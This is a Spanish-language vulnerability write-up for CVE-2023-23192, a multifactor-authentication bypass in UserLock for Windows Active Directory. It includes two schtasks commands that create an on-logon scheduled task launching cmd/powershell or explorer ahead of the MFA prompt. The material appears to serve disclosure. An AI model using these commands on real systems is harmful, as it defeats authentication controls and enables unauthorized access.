
CVE-2023-23192
Descripción: Userlock es una solución de autenticación multifactor para entornos de Active Directory y nube de Windows, diseñada para impedir el acceso no autorizado e indeseado. Permite implementar autenticación de dos factores (2FA) personalizada en el inicio de sesión de Windows, escritorio remoto (RDP y RD Gateway), IIS, VPN y aplicaciones en la nube. Userlock le permite implementar MFA en los inicios de sesión de Active Directory en estaciones de trabajo y servidores unidos a un dominio. Se muestra un cuadro de diálogo en el que puede introducir el código OTP de la aplicación de autenticación en el primer inicio de sesión del día en su estación de trabajo. Userlock se integra con el proceso de inicio de sesión para proporcionar autenticación de dos factores.
Una de las estrategias más explotadas por los actores de amenazas para establecer persistencia en el equipo de una víctima es la programación de tareas. El adversario utiliza con frecuencia esta estrategia para evadir la detección automatizada, mantener la persistencia y llevar a cabo ataques sorpresa tras largos períodos de inactividad.
Vulnerabilidad:
Cree una tarea programada que se ejecute después del inicio de sesión de cualquier usuario.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

Después de iniciar sesión correctamente con las credenciales de dominio, se muestra cmd.exe programado junto con el cuadro de diálogo MFA de Userlock.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"